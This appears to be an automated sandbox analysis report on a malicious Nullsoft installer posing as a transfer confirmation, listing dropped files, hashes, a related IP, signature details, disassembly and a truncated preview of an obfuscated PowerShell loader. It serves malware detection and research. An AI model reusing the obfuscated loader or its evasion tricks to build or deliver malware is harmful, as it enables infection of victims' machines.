                F8DB10513DB12A4BB861D7B1F52E56F5DE5F5DBA7614FDEE3DB67B191FEE85C6.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                • 108.167.181.251
                f84038a5c35557bb57839423dcab27287ac5ab490fca503f496df61da5e2bc99.exeGet hashmaliciousBdaejec, VidarBrowse
                • 108.167.181.251
                F2E3FA89C1A2C72EA78C4D32446221C08B30C7C3363F8248F04AA9EEE2E15C70.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                • 108.167.181.251
                No context
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):65536
                Entropy (8bit):1.2016921897218664
                Encrypted:false
                SSDEEP:192:ZTsvhUtYaT0BU/gjC/h0lwrzuiFiZ24IO8o:Ns6tYaABU/gjHlwrzuiFiY4IO8o
                MD5:6A1F401239A7B8DD30CFADC1062F2119
                SHA1:5EED7AE339474C9E718116F4CADADA562D1D533E
                SHA-256:723BD91DAB97DE4E6F7C63913FC8CF00471CC4A3A90671230E36E9EEE95193C4
                SHA-512:F6754509250B60843667C4282D8AB58C643DF358DC26174180167C0A2F929D059625E1DF363A9D540C2B6C55FB3F62E3A015F4C1AF6554E965091BBE3096AA9F
                Malicious:false
                Reputation:low
                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.5.0.4.2.2.9.6.7.7.0.9.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.5.0.4.2.4.2.3.3.3.2.1.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.1.8.a.b.8.e.7.-.2.a.2.7.-.4.5.8.3.-.a.f.5.0.-.0.6.f.d.a.0.5.2.5.1.e.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.2.7.0.c.d.3.9.-.a.6.f.b.-.4.d.2.c.-.9.c.0.f.-.d.7.5.0.c.2.2.6.8.e.2.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.w.a.b...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.W.A.B...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.3.4.-.0.0.0.1.-.0.0.1.4.-.9.4.5.3.-.c.c.b.2.3.f.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.6.7.7.a.3.5.6.6.7.8.9.d.4.d.a.5.4.5.9.a.1.e.c.d.0.1.a.2.9.7.c.2.6.1.a.1.3.3.a.2.!.w.a.b...e.x.
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:Mini DuMP crash report, 14 streams, Thu Jul 25 03:07:03 2024, 0x1205a4 type
                Category:dropped
                Size (bytes):298863
                Entropy (8bit):3.6357109706381503
                Encrypted:false
                SSDEEP:3072:Bn6UXCQmtf8iuHiICIw0c4uEq/yUIcCxLTgE:B6UXVkfluOj0c4OyUIcCNTg
                MD5:B2101E34A078619FD25978C561AF51B0
                SHA1:BE151FF6F592E0FF44B138A100CD21C288BAC019
                SHA-256:60D96721DE078527179A99A1F8766814B2A91E5BDB1548C4FB69419F769DD1E0
                SHA-512:AEBF7214E2AC8A896AF0F91C676D9BC7F214C742DB14058C2A9CB459069D60C6B0E091EFEC427DEA50ECF387DA12B888D3AC0B53223EB8785F34155C4A251047
                Malicious:false
                Reputation:low
                Preview:MDMP..a..... .......W..f............t...........0"..|.......T%..._..........T.......8...........T........... c..O,...........+...........-..............................................................................eJ......0.......GenuineIntel............T.......4...L..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):8344
                Entropy (8bit):3.69643329883886
                Encrypted:false
                SSDEEP:192:R6l7wVeJnb6ii5L6Y6k6MgmfjP405prw89byCrsf0Vcwm:R6lXJb6iSL6YB6MgmfjP40pyCwfX1
                MD5:7BB8CD84289764D70BD139821D98BFA9
                SHA1:DF99971D9760D3E542CD09AE45D5B27D61560D4A
                SHA-256:42B0E8D2935602EF2CFFB0618F6BA24AF7C2F7EC70D02E800D6615A4275BD4AE
                SHA-512:9FBDEF40C120C4D921CBFA6B78ED1A4681AFCE67FB576EDB908E4EDD71529F42755F9771CC596F1A8CBF063CCB4B521BC87C271248BA304A3F2B8DB60125ABB4
                Malicious:false
                Reputation:low
                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.7.6.<./.P.i.
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):4632
                Entropy (8bit):4.464671557215573
                Encrypted:false
                SSDEEP:48:cvIwWl8zsqJg77aI9EXWpW8VYbYm8M4JFjFA+q8zAj07I48d:uIjf4I7im7VDJwWk48d
                MD5:55C45A6450E12C68F05521688EBD6307
                SHA1:1107B9880B672E6E14875A42EA942ED8EB3507FC
                SHA-256:B4F74BA556DAAB00D6C5A3623DC338174555B91B98D77429A8A30162C128A160
                SHA-512:8FF7BE2437C65446F4D7E5774F2D241D3F29DBED51E1FB1A98F00F2F60270631B913BBDC8DB090E54AFF5438E58DD99064A2F73FE57871AB9D85088476192134
                Malicious:false
                Reputation:low
                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="425889" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:modified
                Size (bytes):8003
                Entropy (8bit):4.840877972214509
                Encrypted:false
                SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                MD5:106D01F562D751E62B702803895E93E0
                SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Reputation:high, very likely benign file
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                Category:dropped
                Size (bytes):868928
                Entropy (8bit):7.614986406787639
                Encrypted:false
                SSDEEP:24576:4YDoeMwkejuoLDfb8gN8R8IJhijTKDPBdKndU:jdMErLvvN8R/LmKDPBGU
                MD5:BAF114AC8DAB2634A6F9E33CC67C4B33
                SHA1:66DA72CA66C33A928A401D160875F82AF9F89BC0
                SHA-256:87AB493612C1A0F03673AC9592DF018F5F11F9222C03DD7D63B173D9DCCB0848
                SHA-512:728E01ECCC8355D1FE29DEDE7CACA34A1717511089E1369CB31A4E7E8CFC3A4533CA2FC95E964C4FE2230B73123AA28B6D7AACF7474F66FBB2A7820C57EB3D71
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 50%
                • Antivirus: Virustotal, Detection: 58%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....f.R.................`...*......X3.......p....@..........................................................................t...........Y...........*..(............................................................p...............................text...f^.......`.................. ..`.rdata..T....p.......d..............@..@.data................x..............@....ndata...................................rsrc....Y.......Z...~..............@..@................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):26
                Entropy (8bit):3.95006375643621
                Encrypted:false
                SSDEEP:3:ggPYV:rPYV
                MD5:187F488E27DB4AF347237FE461A079AD
                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                Malicious:true
                Preview:[ZoneTransfer]....ZoneId=0
                Process:C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe
                File Type:ASCII text, with very long lines (367), with CRLF line terminators
                Category:modified
                Size (bytes):440
                Entropy (8bit):4.2802377004664205
                Encrypted:false
                SSDEEP:12:QEUc9mHApTzMcC94e7q6hDwyK2Xkj9rKZaq:l9JTMp7AyKykBrk
                MD5:9524154CFD936F21394F74D000856732
                SHA1:3A45FE1B1EAAE9A1CAF11CA59FEBA1B3DE8E0CA3
                SHA-256:8EE6AE6BD6F5AF379B359A0CDD7721AEAEE0989C4B61431F2EAB1240FBBA56A2
                SHA-512:4DA2F73D1D6F027B9C939785F63D6F75477F978AB7F8532D8395D5C5C346397E1E4B090CC815AA5F75E2629F81C1FD64B7246266331DBB26D3B0075CE4579250
                Malicious:false
                Preview:habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious deklinationen armiferous bryggerkar totaktsmotorernes ombudsmandsudtalelsers overtinsel metronidazole uldspind..unmortifiedness ildspaasttelserne plagiostomata klauss ryaerne carline,
                Process:C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe
                File Type:data
                Category:dropped
                Size (bytes):221081
                Entropy (8bit):1.2406328235167285
                Encrypted:false
                SSDEEP:768:+sNmrp+QYzgwtqzOh8mcMPPy14oMvFzm8w/Y8vnLXWY8UBiBXVO3FzxrFUHItn4x:Y9A/S50ytu8voKwH
                MD5:D0A61E12A7A27A4B719AB0C4B9F57B88
                SHA1:55A349C760BA7AF05C54934924E2C0289BB3FF24
                SHA-256:243221C7BE40D55E82FDF162332959F85DF94CAF3EC8BC550EEE0DE0FC814A64
                SHA-512:3F117A4C26DDC7200AF9A79E8965F4396D175B368FF372BC7210929B15BA43B56EF68C6870F914638EC49ADF18CB553DF4492F583485ECC954C0238CC1405670
                Malicious:false
                Preview:.....................I...............................................\..................................Y.............................^...............................................................=..........e........................C....P................................`...............-.........................'.........................................................M.........................D....................[@..........................................H..........A...........................................d.........Lk.........................H.......n..............................................................................................C.........................4...v........................JU........&..................................................................]..... ....................................N..............................'.............................^.........................................................................k...............*...............
                Process:C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe
                File Type:ASCII text, with very long lines (65536), with no line terminators
                Category:dropped
                Size (bytes):71792
                Entropy (8bit):5.2243799008382705
                Encrypted:false
                SSDEEP:1536:XWCyUe4+cfOXkak769Pgb6aE+aRxk5z35df7iMhY/FRBv:GCyUe4pfOXkJ+Kb6F+AAbLERBv
                MD5:AA4F469C337E81FDCD252F4E841CA7E5
                SHA1:65C8CA0311B68D764B0FAD3D6EA5061411818D12
                SHA-256:37AF5B072C0AF07340DA85766673FF77278951CD45A75E11B51208D83CF4E591
                SHA-512:0FC9FDDF6DE446281A0B504108DB3306CEDBA2F016289FB38EE10899F0C00CD8831C81E120C36BAA214672CBAE6B4E242E4650D52B3106C4F9D011D752E775D0
                Malicious:false
                Preview:$Discolouring=$Jerngittersengs;<#Ciffers Antitotalitarian Chola #><#Caveman Fantasteriernes Scleroskeleton Ombord Investion Lionship Brainier #><#Anthraconecrosis Draped Mbaya ijore farlighedens #><#Solvente Farveskalaerne Fiskefrikadellernes #><#Fantailed Spindeltrappes Geoemtry Tohjuledes Ponderousness #><#Zoologically Winkers Unlet Olieaffald Silenus nedslaget Veltalendes #>$Spillekants = "Nodic s;Tarr.rt`$ kli.ntM indhiuoWr,iversPanelizs TagryghVandfl,o Lo,tsbrUmagelinSelvbes=Taiwane`$ FornemFUref ekaI.lguidcHominise BefjeltSubs.metBarselseUncommenSvirpadsBombillePhenos p Stentolfremryka PleistnSuper,st AdsprenBau itsi Lepro.nOptjen,gArcograe Unquelr atticinPrealloe Ov.rspsTr,kkab;OverflsFTranquiuIndvindnBerammec FllesntCabbageiUnthinkoHaandkanAntiant CistedU Basunkd Ch rote matri.lTheezaneTronfralFjotte.ianstil gRadioece Sk,less sarkof Crypt.( Funkti`$sakskbiFAkkordeaPreinsuc semicueSacchartklittagtSlidstreB,rnebanUpwellasBlondinoSaltmanrProsopleHeteropmAetosa.aManualisIntellekM
                Process:C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe
                File Type:data
                Category:dropped
                Size (bytes):333158
                Entropy (8bit):7.689371076680782
                Encrypted:false
                SSDEEP:6144:XL0p5fLZGP+G/nNj2eMyykfHsQUyKOJVznleICp4Pp/xWgx1H:XL0Df9O+A5bxf+yKObnkH0hH
                MD5:90DEE1AE90F5B4B7DF59B0A7B0F529C3
                SHA1:673B784036DED375DC2525F026E7E9B1C02D73A1
                SHA-256:C6D6966B18C7F00B542AE5FF5103D8487E2529715F5B0A6500EDE8806AE939CD
                SHA-512:CC1561583BC6F716CACBA2D595EBBFA8EDA0495C677E0EAF4E2E50626C23398DEB7428F31C2F46CC9C4B9B444AE78E1183066CC998B61689BA4E7D71E3B801BE
                Malicious:false
                Preview:.....111.@@........x........................hhhh.....&.............//...................'..*..&..................J..........yyy.....AAAAAAA...................5..ggggg.....gg........!......}........jj....[[[.......................................2.............""........NN...............BBBB.......q................||.............................S......B..}.......[[.....u...........c.e..........aa.........d..................:.XX..................k...................t.......b............f...............MM..;...................................u.......GG...4444..................................###...N.......<.E.KK.......%..6......g....................}...........U...........JJJJ.n.....YY....[.......a........6.............&...........p............SS.........................9.777.............L......K..0....*.P...>>>...-...W.G..w.........r...............SS.....;...........................rr.........................}.A.h.ZZ...pppp..................666......................i.RR...................
                Process:C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe
                File Type:data
                Category:dropped
                Size (bytes):629448
                Entropy (8bit):1.257234589035216
                Encrypted:false
                SSDEEP:1536:LD3CLXCvTm3+3JOgkFWZfcDkZLwWIE4pzswWg95LDsRgtlVkIRh:X3US6uZOgk2fcJl5FWy5LDEQlK0
                MD5:B9E5947712FA407B58A8527B52CE050E
                SHA1:9FD16F2F3569FF478C591E16A03EF65F7D63E57E
                SHA-256:30B60EB19A5E7A32DAB61A17C1BCA485D8040EE9488024AA031C0190A7DCB510
                SHA-512:BBCF1AC518547982928276E01EA61C26600A426EBD57928A82801F5ACBD8E2047359AC1CB41DEB0898CFB5D10BAA419C782C910830517C3F44F555963D6EEB9D
                Malicious:false
                Preview:....,......................................................................k............\..................................J.................................................}.......................R....................... ........k...........$.....................................................'............ ...............................I....................2................=.................................................................................................................d.................................................................g..............................................X.....................j............................................................................4....mJ..T...Z......................... ..................Y......Z.......................................U.............L....u..S......................................................U.................................U..................................................e.........................
                Process:C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe
                File Type:data
                Category:dropped
                Size (bytes):1265909
                Entropy (8bit):3.8593305691819975
                Encrypted:false
                SSDEEP:12288:dL0Df9O+A5bxf+yKObnkH0h96x1b6FlE5Cact5v:iBO+A59f+NO7a0+bp4v
                MD5:AB2E96D72C30FD165FC5224EDF7F7914
                SHA1:1EFDDE4B5BEB0DF8CAE0E89963B47BA9D0FDA9F4
                SHA-256:CF45128B9471DF424AF93918ED654A44522C3C4008E920DD0D1FF83FF8A9B16C
                SHA-512:659DD075214F84E576285A0FF7272A3B455C57F66B4D8529290BAFBF12345EA80DBE3D4946C0C56BB417BF6191AD04DB8CFDD4069C422F6571101C785C297E46
                Malicious:false
                Preview:.&......,...................V...,.......(&.......&........................................................................................................................................................................................................................................G...f...........o...j...............................................................................................................................v...............5.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:MS Windows registry file, NT/2000 or above
                Category:dropped
                Size (bytes):1835008
                Entropy (8bit):4.417304340567438
                Encrypted:false
                SSDEEP:6144:vcifpi6ceLPL9skLmb0mNSWSPtaJG8nAgex285i2MMhA20X4WABlGuNW5+:Ui58NSWIZBk2MM6AFBoo
                MD5:E9E1B670A1033E46E8CFCCDCF641231A
                SHA1:A36CF8A6D26248717E3AD1AA0CA4DD2A194A4B84
                SHA-256:3B92BCB9C1A065133736825F9CDB5C904E2AE945918CF5EB9A6E4D982B02F693
                SHA-512:0F2CEBF09EEE22F7B973FCD42C25AAF0D2EC02F69CA3159474016B18409AC8122EF85C67F6AE036C3A4602F644873DF7AAE81F17840B39774F09999C9489B58C
                Malicious:false
                Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.1..?...............................................................................................................................................................................................................................................................................................................................................3..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                Entropy (8bit):7.614986406787639
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:Confirmation transfer Note AGS # 22-00379.exe
                File size:868'928 bytes
                MD5:baf114ac8dab2634a6f9e33cc67c4b33
                SHA1:66da72ca66c33a928a401d160875f82af9f89bc0
                SHA256:87ab493612c1a0f03673ac9592df018f5f11f9222c03dd7d63b173d9dccb0848
                SHA512:728e01eccc8355d1fe29dede7caca34a1717511089e1369cb31a4e7e8cfc3a4533ca2fc95e964c4fe2230b73123aa28b6d7aacf7474f66fbb2a7820c57eb3d71
                SSDEEP:24576:4YDoeMwkejuoLDfb8gN8R8IJhijTKDPBdKndU:jdMErLvvN8R/LmKDPBGU
                TLSH:23050252B292E950D8494D741213D680CFB29D202E26DB4B37A8B76FDE377C1BF06356
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....f.R.................`...*......X3.......p....@
                Icon Hash:293cc0c898b02800
                Entrypoint:0x403358
                Entrypoint Section:.text
                Digitally signed:true
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                DLL Characteristics:TERMINAL_SERVER_AWARE
                Time Stamp:0x52BA66B2 [Wed Dec 25 05:01:38 2013 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:e221f4f7d36469d53810a4b5f9fc8966
                Signature Valid:false
                Signature Issuer:CN="Pelsdyrfarmene Jockeyer Pylephlebitis ", O=armeringer, L=Saint-Christophe-la-Couperie, S=Pays de la Loire, C=FR
                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                Error Number:-2146762487
                Not Before, Not After
                • 20/06/2024 02:58:57 20/06/2027 02:58:57
                Subject Chain
                • CN="Pelsdyrfarmene Jockeyer Pylephlebitis ", O=armeringer, L=Saint-Christophe-la-Couperie, S=Pays de la Loire, C=FR
                Version:3
                Thumbprint MD5:1E59FFE355ED6EAF9B8CBA833F13B719
                Thumbprint SHA-1:DA3F7049218DAB8EDD052DC47667F2358393B114
                Thumbprint SHA-256:FBDFF8867EE1FE06154E5A95C19BADADACECF39D3773C96F783B1D24FFA5B1D9
                Serial:783CA097075C6E03774CDB0586D6E741699D6FCF
                Instruction
                sub esp, 000002D4h
                push ebx
                push ebp
                push esi
                push edi
                push 00000020h
                xor ebp, ebp
                pop esi
                mov dword ptr [esp+14h], ebp
                mov dword ptr [esp+10h], 00409230h
                mov dword ptr [esp+1Ch], ebp
                call dword ptr [00407034h]
                push 00008001h
                call dword ptr [004070BCh]
                push ebp
                call dword ptr [004072ACh]
                push 00000008h
                mov dword ptr [00429298h], eax
                call 00007F1478F1836Ch
                mov dword ptr [004291E4h], eax
                push ebp
                lea eax, dword ptr [esp+34h]
                push 000002B4h
                push eax
                push ebp
                push 00420690h
                call dword ptr [0040717Ch]
                push 0040937Ch
                push 004281E0h
                call 00007F1478F17FD7h
                call dword ptr [00407134h]
                mov ebx, 00434000h
                push eax
                push ebx
                call 00007F1478F17FC5h
                push ebp
                call dword ptr [0040710Ch]
                cmp word ptr [00434000h], 0022h
                mov dword ptr [004291E0h], eax
                mov eax, ebx
                jne 00007F1478F154BAh
                push 00000022h
                mov eax, 00434002h
                pop esi
                push esi
                push eax
                call 00007F1478F17A16h
                push eax
                call dword ptr [00407240h]
                mov dword ptr [esp+18h], eax
                jmp 00007F1478F1557Eh
                push 00000020h
                pop edx
                cmp cx, dx
                jne 00007F1478F154B9h
                inc eax
                inc eax
                cmp word ptr [eax], dx
                je 00007F1478F154ABh
                add word ptr [eax], 0000h
                Programming Language:
                • [EXP] VC++ 6.0 SP5 build 8804
                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x74940xb4.rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x480000x55918.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0xd2a180x1828
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x70000x2b8.rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x5e660x6000e8f12472e91b02deb619070e6ee7f1f4False0.6566569010416666data6.419409887460116IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rdata0x70000x13540x14002222fe44ebbadbc32af32dfc9c88e48eFalse0.4306640625data5.037511188789184IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data0x90000x202d80x600a5ec1b720d350c6303a7aba8d85072bfFalse0.4733072916666667data3.7600484096214832IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .ndata0x2a0000x1e0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc0x480000x559180x55a003d6a8b72f49b497aa2f6e828f36e2071False0.6818487682481752data6.750089044557724IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                NameRVASizeTypeLanguageCountryZLIB Complexity
                RT_ICON0x486e80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.48516798769667574
                RT_ICON0x58f100x104d3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0004043671653862
